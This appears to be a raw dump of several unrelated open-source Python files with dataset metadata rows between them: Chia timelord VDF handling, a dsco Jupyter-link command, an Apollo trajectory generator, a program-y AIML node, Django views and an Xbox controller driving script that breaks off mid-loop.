                log.info(f"Including sub epoch summary{next_ses}")
                ses_hash = next_ses.get_hash()
                new_sub_slot_iters = next_ses.new_sub_slot_iters
                new_difficulty = next_ses.new_difficulty
            else:
                ses_hash = None
                new_sub_slot_iters = None
                new_difficulty = None
            cc_sub_slot = ChallengeChainSubSlot(cc_vdf, icc_sub_slot_hash, ses_hash, new_sub_slot_iters, new_difficulty)
            eos_deficit: uint8 = (
                self.last_state.get_deficit()
                if self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK > self.last_state.get_deficit() > 0
                else self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
            )
            rc_sub_slot = RewardChainSubSlot(
                rc_vdf,
                cc_sub_slot.get_hash(),
                icc_sub_slot.get_hash() if icc_sub_slot is not None else None,
                eos_deficit,
            )
            eos_bundle = EndOfSubSlotBundle(
                cc_sub_slot,
                icc_sub_slot,
                rc_sub_slot,
                SubSlotProofs(cc_proof, icc_ip_proof, rc_proof),
            )
            if self.server is not None:
                msg = make_msg(
                    ProtocolMessageTypes.new_end_of_sub_slot_vdf,
                    timelord_protocol.NewEndOfSubSlotVDF(eos_bundle),
                )
                await self.server.send_to_all([msg], NodeType.FULL_NODE)
            log.info(
                f"Built end of subslot bundle. cc hash: {eos_bundle.challenge_chain.get_hash()}. New_difficulty: "
                f"{eos_bundle.challenge_chain.new_difficulty} New ssi: {eos_bundle.challenge_chain.new_sub_slot_iters}"
            )
            if next_ses is None or next_ses.new_difficulty is None:
                # Carry overflow blocks into the next sub-slot.
                self.unfinished_blocks = self.overflow_blocks.copy()
            else:
                # No overflow blocks in a new epoch
                self.unfinished_blocks = []
            self.overflow_blocks = []
            self.new_subslot_end = eos_bundle
            await self._handle_subslot_end()
    async def _handle_failures(self):
        """Recover from vdf_client failures and from prolonged inactivity."""
        if len(self.vdf_failures) > 0:
            # This can happen if one of the VDF processes has an issue. In this case, we abort all other
            # infusion points and signage points, and go straight to the end of slot, so we avoid potential
            # issues with the number of iterations that failed.
            failed_chain, proof_label = self.vdf_failures[0]
            log.error(
                f"Vdf clients failed {self.vdf_failures_count} times. Last failure: {failed_chain}, "
                f"label {proof_label}, current: {self.num_resets}"
            )
            # Only reset when the failure belongs to the current generation
            # of chains; stale failures from before a reset are ignored.
            if proof_label == self.num_resets:
                await self._reset_chains(only_eos=True)
            self.vdf_failure_time = time.time()
            self.vdf_failures = []
        # If something goes wrong in the VDF client due to a failed thread, we might get stuck in a situation where we
        # are waiting for that client to finish. Usually other peers will finish the VDFs and reset us. In the case that
        # there are no other timelords, this reset should bring the timelord back to a running state.
        if time.time() - self.vdf_failure_time < self.constants.SUB_SLOT_TIME_TARGET * 3:
            # If we have recently had a failure, allow some more time to finish the slot (we can be up to 3x slower)
            active_time_threshold = self.constants.SUB_SLOT_TIME_TARGET * 3
        else:
            # If there were no failures recently trigger a reset after 60 seconds of no activity.
            # Signage points should be every 9 seconds
            active_time_threshold = 60
        if time.time() - self.last_active_time > active_time_threshold:
            log.error(f"Not active for {active_time_threshold} seconds, restarting all chains")
            await self._reset_chains()
    async def _manage_chains(self):
        """Main timelord loop.

        After an initial delay and chain reset, repeatedly: handle failures,
        process a new peak if one arrived, map free vdf_clients to chains,
        submit pending iterations, and then check the smallest outstanding
        iteration for an infusion point, a signage point, and an end of
        sub-slot. Exceptions are logged and the loop continues.
        """
        async with self.lock:
            await asyncio.sleep(5)
            await self._reset_chains(True)
        while not self._shut_down:
            try:
                await asyncio.sleep(0.1)
                async with self.lock:
                    await self._handle_failures()
                    # We've got a new peak, process it.
                    if self.new_peak is not None:
                        await self._handle_new_peak()
                # Map free vdf_clients to unspawned chains.
                await self._map_chains_with_vdf_clients()
                async with self.lock:
                    # Submit pending iterations.
                    await self._submit_iterations()
                    not_finished_iters = [
                        it for it in self.iters_submitted[Chain.REWARD_CHAIN] if it not in self.iters_finished
                    ]
                    if len(not_finished_iters) == 0:
                        await asyncio.sleep(0.1)
                        continue
                    selected_iter = min(not_finished_iters)
                    # Check for new infusion point and broadcast it if present.
                    await self._check_for_new_ip(selected_iter)
                    # Check for new signage point and broadcast it if present.
                    await self._check_for_new_sp(selected_iter)
                    # Check for end of subslot, respawn chains and build EndOfSubslotBundle.
                    await self._check_for_end_of_subslot(selected_iter)
            except Exception:
                tb = traceback.format_exc()
                log.error(f"Error while handling message: {tb}")
    async def _do_process_communication(
        self,
        chain: Chain,
        challenge: bytes32,
        initial_form: ClassgroupElement,
        ip: str,
        reader: asyncio.StreamReader,
        writer: asyncio.StreamWriter,
        # Data specific only when running in bluebox mode.
        bluebox_iteration: Optional[uint64] = None,
        header_hash: Optional[bytes32] = None,
        height: Optional[uint32] = None,
        field_vdf: Optional[uint8] = None,
        # Labels a proof to the current state only
        proof_label: Optional[int] = None,
    ):
        """Drive one vdf_client connection for a single chain.

        Performs the handshake (algorithm selection, discriminant, initial
        form), then reads length-prefixed proofs until the client sends
        "STOP". Verified proofs are appended to self.proofs_finished (or, in
        sanitizer/bluebox mode, broadcast as compact proofs). Any read error
        is recorded in self.vdf_failures so _handle_failures can recover.
        """
        disc: int = create_discriminant(challenge, self.constants.DISCRIMINANT_SIZE_BITS)
        try:
            # Depending on the flags 'fast_algorithm' and 'sanitizer_mode',
            # the timelord tells the vdf_client what to execute.
            async with self.lock:
                if self.sanitizer_mode:
                    writer.write(b"S")
                else:
                    if self.config["fast_algorithm"]:
                        # Run n-wesolowski (fast) algorithm.
                        writer.write(b"N")
                    else:
                        # Run two-wesolowski (slow) algorithm.
                        writer.write(b"T")
                await writer.drain()
            # Send the discriminant with a 3-character zero-padded length prefix.
            prefix = str(len(str(disc)))
            if len(prefix) == 1:
                prefix = "00" + prefix
            if len(prefix) == 2:
                prefix = "0" + prefix
            async with self.lock:
                writer.write((prefix + str(disc)).encode())
                await writer.drain()
            # Send initial_form prefixed with its length.
            async with self.lock:
                writer.write(bytes([len(initial_form.data)]) + initial_form.data)
                await writer.drain()
            try:
                ok = await reader.readexactly(2)
            except (asyncio.IncompleteReadError, ConnectionResetError, Exception) as e:
                log.warning(f"{type(e)} {e}")
                async with self.lock:
                    self.vdf_failures.append((chain, proof_label))
                    self.vdf_failures_count += 1
                return None
            if ok.decode() != "OK":
                return None
            log.debug("Got handshake with VDF client.")
            if not self.sanitizer_mode:
                async with self.lock:
                    self.allows_iters.append(chain)
            else:
                # Bluebox/sanitizer mode: submit the single iteration count
                # immediately (two-character length prefix + decimal digits).
                async with self.lock:
                    assert chain is Chain.BLUEBOX
                    assert bluebox_iteration is not None
                    prefix = str(len(str(bluebox_iteration)))
                    if len(str(bluebox_iteration)) < 10:
                        prefix = "0" + prefix
                    iter_str = prefix + str(bluebox_iteration)
                    writer.write(iter_str.encode())
                    await writer.drain()
            # Listen to the client until "STOP" is received.
            while True:
                try:
                    data = await reader.readexactly(4)
                except (
                    asyncio.IncompleteReadError,
                    ConnectionResetError,
                    Exception,
                ) as e:
                    log.warning(f"{type(e)} {e}")
                    async with self.lock:
                        self.vdf_failures.append((chain, proof_label))
                        self.vdf_failures_count += 1
                    break
                msg = ""
                try:
                    msg = data.decode()
                except Exception:
                    pass
                if msg == "STOP":
                    log.debug(f"Stopped client running on ip {ip}.")
                    async with self.lock:
                        writer.write(b"ACK")
                        await writer.drain()
                    break
                else:
                    try:
                        # This must be a proof, 4 bytes is length prefix
                        length = int.from_bytes(data, "big")
                        proof = await reader.readexactly(length)
                        stdout_bytes_io: io.BytesIO = io.BytesIO(bytes.fromhex(proof.decode()))
                    except (
                        asyncio.IncompleteReadError,
                        ConnectionResetError,
                        Exception,
                    ) as e:
                        log.warning(f"{type(e)} {e}")
                        async with self.lock:
                            self.vdf_failures.append((chain, proof_label))
                            self.vdf_failures_count += 1
                        break
                    # Payload layout: 8-byte iteration count, 8-byte output
                    # size, output bytes, 1-byte witness type, witness bytes.
                    iterations_needed = uint64(int.from_bytes(stdout_bytes_io.read(8), "big", signed=True))
                    y_size_bytes = stdout_bytes_io.read(8)
                    y_size = uint64(int.from_bytes(y_size_bytes, "big", signed=True))
                    y_bytes = stdout_bytes_io.read(y_size)
                    witness_type = uint8(int.from_bytes(stdout_bytes_io.read(1), "big", signed=True))
                    proof_bytes: bytes = stdout_bytes_io.read()
                    # Verifies our own proof just in case
                    form_size = ClassgroupElement.get_size(self.constants)
                    output = ClassgroupElement.from_bytes(y_bytes[:form_size])
                    if not self.sanitizer_mode:
                        time_taken = time.time() - self.chain_start_time[chain]
                        ips = int(iterations_needed / time_taken * 10) / 10
                        log.info(
                            f"Finished PoT chall:{challenge[:10].hex()}.. {iterations_needed}"
                            f" iters, "
                            f"Estimated IPS: {ips}, Chain: {chain}"
                        )
                    vdf_info: VDFInfo = VDFInfo(
                        challenge,
                        iterations_needed,
                        output,
                    )
                    vdf_proof: VDFProof = VDFProof(
                        witness_type,
                        proof_bytes,
                        self.sanitizer_mode,
                    )
                    # Note: an invalid proof is only logged here; the code
                    # below still records/broadcasts it.
                    if not vdf_proof.is_valid(self.constants, initial_form, vdf_info):
                        log.error("Invalid proof of time!")
                    if not self.sanitizer_mode:
                        async with self.lock:
                            assert proof_label is not None
                            self.proofs_finished.append((chain, vdf_info, vdf_proof, proof_label))
                    else:
                        async with self.lock:
                            writer.write(b"010")
                            await writer.drain()
                        assert header_hash is not None
                        assert field_vdf is not None
                        assert height is not None
                        response = timelord_protocol.RespondCompactProofOfTime(
                            vdf_info, vdf_proof, header_hash, height, field_vdf
                        )
                        if self.server is not None:
                            message = make_msg(ProtocolMessageTypes.respond_compact_proof_of_time, response)
                            await self.server.send_to_all([message], NodeType.FULL_NODE)
        except ConnectionResetError as e:
            log.debug(f"Connection reset with VDF client {e}")
    async def _manage_discriminant_queue_sanitizer(self):
        """Feed pending bluebox (compact-proof) work to free vdf_clients.

        Pairs each queued VDFInfo with a free client and spawns the
        communication task in bluebox mode; runs until shutdown.
        """
        while not self._shut_down:
            async with self.lock:
                try:
                    while len(self.pending_bluebox_info) > 0 and len(self.free_clients) > 0:
                        # Select randomly the field_vdf we're creating a compact vdf for.
                        # This is done because CC_SP and CC_IP are more frequent than
                        # CC_EOS and ICC_EOS. This guarantees everything is picked uniformly.
                        target_field_vdf = random.randint(1, 4)
                        info = next(
                            (info for info in self.pending_bluebox_info if info.field_vdf == target_field_vdf),
                            None,
                        )
                        if info is None:
                            # Nothing found with target_field_vdf, just pick the first VDFInfo.
                            info = self.pending_bluebox_info[0]
                        ip, reader, writer = self.free_clients[0]
                        self.process_communication_tasks.append(
                            asyncio.create_task(
                                self._do_process_communication(
                                    Chain.BLUEBOX,
                                    info.new_proof_of_time.challenge,
                                    ClassgroupElement.get_default_element(),
                                    ip,
                                    reader,
                                    writer,
                                    info.new_proof_of_time.number_of_iterations,
                                    info.header_hash,
                                    info.height,
                                    info.field_vdf,
                                )
                            )
                        )
                        self.pending_bluebox_info.remove(info)
                        self.free_clients = self.free_clients[1:]
                except Exception as e:
                    log.error(f"Exception manage discriminant queue: {e}")
            await asyncio.sleep(0.1)
| 49.366795 | 120 | 0.562432 |
acdfc5147c7d16215e7d6def362a268948a4a8b0 | 2,553 | py | Python | dsco/commands/jupyter.py | Teradata/dsco | 2dd39ec637d01aac30fee0a1feb596316b90d934 | [
"MIT"
] | 3 | 2020-03-20T13:01:54.000Z | 2021-10-19T17:49:18.000Z | dsco/commands/jupyter.py | Teradata/dsco | 2dd39ec637d01aac30fee0a1feb596316b90d934 | [
"MIT"
] | null | null | null | dsco/commands/jupyter.py | Teradata/dsco | 2dd39ec637d01aac30fee0a1feb596316b90d934 | [
"MIT"
] | null | null | null | """Provide the link to the jupyter notebook server including login token
"""
import os
from pathlib import Path
import subprocess
import yaml
from dsco.helpers import get_container
from dsco.local_options import Settings as settings
# Sub-command name, derived from this module's filename ("jupyter").
cmd_name = Path(__file__).stem
# ANSI terminal escape sequences used to colorize console output.
OKBLUE = "\033[94m"  # blue foreground
REVERSED = "\u001b[7m"  # reverse video (highlighted banner)
UNDERLINE = "\033[4m"  # underline (currently unused in this module)
ENDC = "\033[0m"  # reset all attributes
def add_subparser(subparsers):
    """Register the jupyter sub-command and its service-selection flags."""
    sub = subparsers.add_parser(cmd_name, help="link to jupyter notebook")
    # One boolean flag per docker-compose service, plus --all as a shorthand.
    for flag, help_text in (
        ("--dev", "dev"),
        ("--prod", "prod"),
        ("--debug", "debug"),
        ("--all", "dev, prod, and debug"),
    ):
        sub.add_argument(flag, action="store_true", help=help_text)
def run_cmd(args, conf):
    """Print the URL (including login token) of each selected service's
    running Jupyter notebook server.

    Args:
        args: parsed argparse namespace with dev/prod/debug/all booleans.
        conf: project configuration dict with "proj_root", "pyproject"
            and "docker_compose_yaml" entries.
    """
    # Guard clause instead of wrapping the whole body in an if-block.
    if not conf["proj_root"]:
        print("No project found.")
        return
    # With no explicit flag, default to the dev service only.
    no_flag = not any([args.dev, args.prod, args.debug, args.all])
    flag_list = [
        # (service, service_flag)
        ("dev", args.dev or args.all or no_flag),
        ("prod", args.prod or args.all),
        ("debug", args.debug or args.all),
    ]
    proj_name = conf["pyproject"]["tool"]["poetry"]["name"]
    local_settings = settings.get_local_kernal()
    try:
        local_ip = local_settings["properties"]["ip"]
    except KeyError:
        local_ip = "localhost"
    # Iterate only the services whose flag is set (replaces the old
    # `lambda`-based filter, which violated PEP 8 E731).
    for service, enabled in flag_list:
        if not enabled:
            continue
        get_container_cmd = get_container(proj_name, service)
        ports = conf["docker_compose_yaml"]["services"][service]["ports"]
        # Host-side port of the "host:container" mapping.
        port = ports[0].split(":")[0]
        cmd = f"docker exec -it $({get_container_cmd}) jupyter notebook list"
        print(REVERSED + f"{proj_name + '_' + service:<88}" + ENDC)
        print(OKBLUE + cmd + ENDC)
        # expected output of cmd:
        # Currently running servers:
        # http://0.0.0.0:8888/notebook/?token=<token> :: /srv
        try:
            result = (
                subprocess.run(cmd, shell=True, capture_output=True)
                .stdout.decode("utf-8")
                .strip()
                .split("\n")
            )[-1].split()[0]
        except IndexError:
            # Last output line was empty -> no server URL to parse.
            # (Was an f-string with no placeholders; plain string now.)
            print("No server found.")
        else:
            token = result.split("=")[-1]
            print(f"http://{local_ip}:{port}/notebook/?token={token}")
def add_dispatch(dispatcher):
    # Register this module's run_cmd under its sub-command name so the CLI
    # driver can dispatch "dsco jupyter" to it.
    dispatcher[cmd_name] = run_cmd
| 34.5 | 81 | 0.578927 |
acdfc5b87a0cf03690ae7ab91879b6f3ee524514 | 2,829 | py | Python | modules/tools/navigation/planning/trajectory_generator.py | DavidSplit/apollo-3.0 | 9f82838e857e4c9146952946cbc34b9f35098deb | [
"Apache-2.0"
] | 6 | 2019-10-11T07:57:49.000Z | 2022-02-23T15:23:41.000Z | modules/tools/navigation/planning/trajectory_generator.py | DavidSplit/apollo-3.0 | 9f82838e857e4c9146952946cbc34b9f35098deb | [
"Apache-2.0"
] | null | null | null | modules/tools/navigation/planning/trajectory_generator.py | DavidSplit/apollo-3.0 | 9f82838e857e4c9146952946cbc34b9f35098deb | [
"Apache-2.0"
] | 12 | 2019-10-11T07:57:49.000Z | 2022-03-16T05:13:00.000Z | #!/usr/bin/env python
###############################################################################
# Copyright 2017 The Apollo Authors. All Rights Reserved.
# Modifications Copyright (c) 2018 LG Electronics, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import math
import time
import rospy
from numpy.polynomial.polynomial import polyval
from modules.planning.proto import planning_pb2
from modules.canbus.proto import chassis_pb2
from modules.common.proto import drive_state_pb2
def euclidean_distance(point1, point2):
    """Return the Euclidean (straight-line) distance between two 2-D points.

    Each point is an (x, y) pair (anything indexable with numeric [0]/[1]).
    """
    # math.hypot is clearer than summing squares by hand and avoids
    # intermediate overflow/underflow for extreme coordinates.
    return math.hypot(point1[0] - point2[0], point1[1] - point2[1])
def get_theta(point, point_base):
    """Return the heading angle of *point* as seen from *point_base*.

    Computed as atan2(1, 0) (i.e. pi/2) minus the angle of the (dx, dy)
    offset, matching the planner's coordinate convention.
    """
    dx = point[0] - point_base[0]
    dy = point[1] - point_base[1]
    return math.atan2(1, 0) - math.atan2(dx, dy)
class TrajectoryGenerator:
    """Builds planning ADCTrajectory messages from a smoothed path."""

    def __init__(self):
        # Reserved for a mobileye message; generate() does not read it.
        self.mobileye_pb = None

    def generate(self, path, final_path_length, speed,
                 start_timestamp):
        """Convert *path* into an ADCTrajectory driven at constant *speed*.

        Emits one trajectory point per unit x for the first
        final_path_length - 1 path samples; s and relative_time accumulate
        along the path. *start_timestamp* is used for latency reporting.
        """
        _, path_y = path.get_xy()

        adc_trajectory = planning_pb2.ADCTrajectory()
        adc_trajectory.header.timestamp_sec = rospy.Time.now().to_sec()
        adc_trajectory.header.module_name = "planning"
        adc_trajectory.gear = chassis_pb2.Chassis.GEAR_DRIVE
        adc_trajectory.latency_stats.total_time_ms = \
            (time.time() - start_timestamp) * 1000
        adc_trajectory.engage_advice.advice \
            = drive_state_pb2.EngageAdvice.READY_TO_ENGAGE

        accumulated_s = 0
        relative_time = 0
        for x in range(int(final_path_length - 1)):
            y = path_y[x]
            traj_point = adc_trajectory.trajectory_point.add()
            traj_point.path_point.x = x
            traj_point.path_point.y = y
            if x > 0:
                # Arc length and travel time accumulate point to point.
                step = euclidean_distance((x, y), (x - 1, path_y[x - 1]))
                accumulated_s += step
                relative_time += step / speed
            # Heading toward the next sample, relative to the path origin.
            traj_point.path_point.theta = get_theta(
                (x + 1, path_y[x + 1]), (0, path_y[0]))
            traj_point.path_point.s = accumulated_s
            traj_point.v = speed
            traj_point.relative_time = relative_time
        return adc_trajectory
| 37.72 | 79 | 0.618593 |
acdfc7483feb68b40d100bd6710079886a362043 | 2,772 | py | Python | src/programy/parser/pattern/nodes/priority.py | cdoebler1/AIML2 | ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a | [
"MIT"
] | 345 | 2016-11-23T22:37:04.000Z | 2022-03-30T20:44:44.000Z | src/programy/parser/pattern/nodes/priority.py | MikeyBeez/program-y | 00d7a0c7d50062f18f0ab6f4a041068e119ef7f0 | [
"MIT"
] | 275 | 2016-12-07T10:30:28.000Z | 2022-02-08T21:28:33.000Z | src/programy/parser/pattern/nodes/priority.py | VProgramMist/modified-program-y | f32efcafafd773683b3fe30054d5485fe9002b7d | [
"MIT"
] | 159 | 2016-11-28T18:59:30.000Z | 2022-03-20T18:02:44.000Z | """
Copyright (c) 2016-2020 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.parser.pattern.nodes.base import PatternNode
from programy.parser.pattern.equalsmatch import EqualsMatch
class PatternPriorityWordNode(PatternNode):
    """Pattern-graph node matching a single priority ($-prefixed) word.

    Priority words are matched ahead of wildcards during AIML pattern
    matching; a node may additionally be restricted to one userid.
    """

    def __init__(self, word, userid='*'):
        PatternNode.__init__(self, userid)
        self._priority_word = word

    @property
    def priority_word(self):
        return self._priority_word

    def is_priority(self):
        # Identifies this node type to the matcher.
        return True

    def to_xml(self, client_context, include_user=False):
        """Serialise this node and its children to an XML fragment."""
        if include_user is True:
            opening = '<priority userid="%s" word="%s">' % (self.userid, self.priority_word)
        else:
            opening = '<priority word="%s">' % self.priority_word
        children = super(PatternPriorityWordNode, self).to_xml(client_context)
        return opening + children + '</priority>\n'

    def to_string(self, verbose=True):
        """Return a short human-readable description of this node."""
        if verbose is not True:
            return "PWORD [%s]" % (self.priority_word)
        return "PWORD [%s] [%s] word=[%s]" % (self.userid, self._child_count(verbose), self.priority_word)

    def equivalent(self, other):
        """Two priority nodes are equivalent when userid and word agree."""
        return bool(other.is_priority()
                    and self.userid == other.userid
                    and self.priority_word == other.priority_word)

    def equals(self, client_context, words, word_no):
        """Match the sentence word at word_no against this priority word."""
        word = words.word(word_no)
        # A user-restricted node never matches another user's request.
        if self.userid != '*' and self.userid != client_context.userid:
            return EqualsMatch(False, word_no)
        if self.equals_ignore_case(self.priority_word, word):
            return EqualsMatch(True, word_no, word)
        return EqualsMatch(False, word_no)
| 41.373134 | 120 | 0.694444 |
acdfc77b0ada0dbb771e2372e7856638104703c2 | 566 | py | Python | Nessus_Map/views.py | fa1c0n-king/Nessus_Map | 86546dd8e4e9294ed1f744e25d59f892d78d5d43 | [
"MIT"
] | 121 | 2019-11-24T15:18:48.000Z | 2022-03-08T16:31:23.000Z | Nessus_Map/views.py | fa1c0n-king/Nessus_Map | 86546dd8e4e9294ed1f744e25d59f892d78d5d43 | [
"MIT"
] | 9 | 2019-12-04T03:58:55.000Z | 2022-03-12T00:07:28.000Z | Nessus_Map/views.py | fa1c0n-king/Nessus_Map | 86546dd8e4e9294ed1f744e25d59f892d78d5d43 | [
"MIT"
] | 32 | 2019-12-02T03:49:56.000Z | 2022-01-07T08:57:31.000Z | from django.shortcuts import render, redirect
from django.conf import settings
from filebrowser.base import FileListing
def home_view(request):
filelisting = FileListing(settings.MEDIA_ROOT, sorting_by='date', sorting_order='desc')
files = filelisting.listing()
return render(request, 'index.html', {'files' : files})
def home_alert(request, alert):
filelisting = FileListing(settings.MEDIA_ROOT, sorting_by='date', sorting_order='desc')
files = filelisting.listing()
return render(request, 'index.html', {'files' : files, 'alert': alert})
| 40.428571 | 91 | 0.743816 |
acdfc7a7ba6feecbc79fd2c5d22724e458f8f4db | 14,298 | py | Python | packages/peripheralsInterface/scripts/driveByXbox360Controller.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 2 | 2021-01-15T13:27:19.000Z | 2021-08-04T08:40:52.000Z | packages/peripheralsInterface/scripts/driveByXbox360Controller.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | null | null | null | packages/peripheralsInterface/scripts/driveByXbox360Controller.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 5 | 2018-05-01T10:39:31.000Z | 2022-03-25T03:02:35.000Z | # Copyright 2018-2020 Jan Feitsma (Falcons)
# SPDX-License-Identifier: Apache-2.0
#!/usr/bin/env python3
# Author: Jan Feitsma
# Date: 2018-09-23
#
# This script requires a connected (USB) xbox 360 controller.
# It will feed the commands to motion, it can be even run on coach
# because it uses RTDB.
#
# Keys:
# left-stick: drive (forward, backward, strafe)
# right-stick: rotate
# right-trigger: shoot
# left-trigger: modify kicker height (hold while shooting)
# B: ballhandler on/off
#
# loosely based on: https://pypi.org/project/xbox360controller/ -- no, doesn't work: requires python3 which is incompatible with rtdb2
from __future__ import print_function
import argparse
import signal
import pygame
import sys, time
import pause, datetime
import falconspy
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
class Button:
    """Two-state (pressed / released) controller element.

    Examples: A, left-stick (LS), right-bumper (RB), select.
    """

    def __init__(self):
        # Edge callbacks start out as no-ops; clients assign handlers.
        do_nothing = lambda: None
        self.when_pressed = do_nothing
        self.when_released = do_nothing
        self.is_pressed = False
class Axis1:
    """One-dimensional analog controller element.

    Examples: left-trigger (LT), right-trigger (RT).
    """

    def __init__(self):
        # Movement callback starts as a no-op; clients assign a handler.
        self.when_moved = lambda: None
        self.x = 0.0
class Axis2:
    """Two-dimensional analog controller element.

    Examples: left-stick (LS), right-stick (RS).
    """

    def __init__(self):
        # Movement callback starts as a no-op; clients assign a handler.
        self.when_moved = lambda: None
        self.x = 0.0
        self.y = 0.0
class Xbox360Controller:
    """
    Maintain live the state of the controller.
    Can fire callbacks upon change.
    Tries to mimick the behavior by https://pypi.org/project/xbox360controller.
    Uses pygame to connect to the controller and handle events.
    """
    def __init__(self, index=0, axis_threshold=0.2):
        """Open joystick 'index' (pygame enumeration order).

        axis_threshold: minimum axis delta before when_moved callbacks
        fire, debouncing noisy analog sticks/triggers.
        """
        self.axis_threshold = axis_threshold
        self.live_dump_mode = False
        self.callback = lambda s: None  # fired once per cycle with self
        # setup controller elements
        self.button_a = Button()
        self.button_b = Button()
        self.button_x = Button()
        self.button_y = Button()
        self.button_lb = Button() # left bumper
        self.button_rb = Button() # right bumper
        self.button_ls = Button() # left stick
        self.button_rs = Button() # right stick
        self.button_select = Button()
        self.button_start = Button()
        self.button_mode = Button() # a.k.a. globe
        self.buttons = {"A": self.button_a, "B": self.button_b, "X": self.button_x, "Y": self.button_y,
                        "LB": self.button_lb, "RB": self.button_rb, "LS": self.button_ls, "RS": self.button_rs,
                        "select": self.button_select, "start": self.button_start, "mode": self.button_mode}
        self.axis_lt = Axis1()
        self.axis_rt = Axis1()
        # triggers rest at -1.0 (fully released) in pygame's axis convention
        self.axis_lt.x = -1.0
        self.axis_rt.x = -1.0
        self.axis_ls = Axis2()
        self.axis_rs = Axis2()
        # store initial axis values, needed for delta tracking using threshold
        self.prev = [0.0] * 6
        # initialize controller
        pygame.init()
        pygame.joystick.init()
        joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]
        if len(joysticks) < 1:
            raise Exception("no joysticks")
        for idx in range(len(joysticks)):
            # bugfix: print each joystick's own name (was joysticks[index],
            # which repeated the selected joystick's name for every entry)
            print("detected joystick {}: {}".format(idx, joysticks[idx].get_name()))
        print("using joystick {}".format(index))
        self.joystick = joysticks[index]
        self.joystick.init()
        self.frequency = 30.0 # Hz

    def echo_onchange(self):
        """
        Install callbacks to echo state change. Useful for testing controller state and developing.
        """
        for b in self.buttons.keys():
            # mind b=b to bind evaluation, otherwise python will behave lazy...
            self.buttons[b].when_pressed = lambda b=b: print("button {} pressed".format(b))
            self.buttons[b].when_released = lambda b=b: print("button {} released".format(b))
        self.axis_lt.when_moved = lambda: print("trigger LT got value {:6.3f}".format(self.axis_lt.x))
        self.axis_rt.when_moved = lambda: print("trigger RT got value {:6.3f}".format(self.axis_rt.x))
        self.axis_ls.when_moved = lambda: print("stick LS got value ({:6.3f},{:6.3f})".format(self.axis_ls.x, self.axis_ls.y))
        self.axis_rs.when_moved = lambda: print("stick RS got value ({:6.3f},{:6.3f})".format(self.axis_rs.x, self.axis_rs.y))

    def live_dump(self):
        """Enable printing the full controller state once per cycle."""
        self.live_dump_mode = True

    def __str__(self):
        # One-line dump of all buttons (as 0/1) and axes.
        s = "A={:d} B={:d} X={:d} Y={:d}".format(self.button_a.is_pressed, self.button_b.is_pressed, self.button_x.is_pressed, self.button_y.is_pressed)
        s += " LB={:d} RB={:d} LS={:d} RS={:d}".format(self.button_lb.is_pressed, self.button_rb.is_pressed, self.button_ls.is_pressed, self.button_rs.is_pressed)
        s += " sel={:d} st={:d} m={:d}".format(self.button_select.is_pressed, self.button_start.is_pressed, self.button_mode.is_pressed)
        s += " LT={:6.3f} RT={:6.3f}".format(self.axis_lt.x, self.axis_rt.x)
        s += " LS=({:6.3f},{:6.3f}) RS=({:6.3f},{:6.3f})".format(self.axis_ls.x, self.axis_ls.y, self.axis_rs.x, self.axis_rs.y)
        return s

    def run(self):
        """Poll pygame events at self.frequency until QUIT or Ctrl-C.

        Updates element state, fires edge/movement callbacks once per
        cycle (deduplicated via a set), then fires self.callback(self).
        """
        # loop using pygame
        dt = datetime.timedelta(seconds=(1.0 / self.frequency))
        t = datetime.datetime.now()
        try:
            # setup pygame index maps
            buttons = {0: self.button_a, 1: self.button_b, 2: self.button_x, 3: self.button_y,
                       4: self.button_lb, 5: self.button_rb, 6: self.button_select, 7: self.button_start,
                       8: self.button_mode, 9: self.button_ls, 10: self.button_rs}
            # iterate
            done = False
            while not done:
                # initialize the list of callbacks to fire
                callbacks = set()
                # process all events
                for event in pygame.event.get():
                    # done?
                    if event.type == pygame.QUIT:
                        done = True
                    # possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION
                    if event.type == pygame.JOYAXISMOTION:
                        # Axis layout assumed: 0/1 = LS x/y, 2 = LT,
                        # 3/4 = RS x/y, 5 = RT -- TODO confirm per platform.
                        ax = None
                        if event.axis == 0:
                            self.axis_ls.x = event.value
                            ax = self.axis_ls
                        elif event.axis == 1:
                            self.axis_ls.y = event.value
                            ax = self.axis_ls
                        elif event.axis == 2:
                            self.axis_lt.x = event.value
                            ax = self.axis_lt
                        elif event.axis == 3:
                            self.axis_rs.x = event.value
                            ax = self.axis_rs
                        elif event.axis == 4:
                            self.axis_rs.y = event.value
                            ax = self.axis_rs
                        elif event.axis == 5:
                            self.axis_rt.x = event.value
                            ax = self.axis_rt
                        # check against delta threshold and if needed update previous value
                        delta = abs(self.prev[event.axis] - event.value)
